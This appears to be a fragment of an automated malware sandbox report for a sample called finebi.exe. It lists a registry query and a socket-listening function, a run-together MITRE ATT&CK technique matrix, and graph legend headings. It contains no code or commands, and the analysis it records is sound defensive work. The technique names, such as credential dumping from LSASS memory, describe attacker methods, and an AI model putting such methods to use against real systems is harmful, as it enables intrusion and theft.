Source: C:\Users\user\Desktop\finebi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA97C80 socket,htons,ioctlsocket,bind,listen,closesocket,0_2_00007FF75DA97C80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure2
Valid Accounts		1
Native API		2
Valid Accounts		2
Valid Accounts		2
Valid Accounts		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		21
Access Token Manipulation		21
Access Token Manipulation		LSASS Memory131
Security Software Discovery		Remote Desktop ProtocolData from Removable Media1
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
Process Injection		2
Process Injection		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		NTDS1
Account Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
System Owner/User Discovery		SSHKeylogging12
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials1
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync3
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.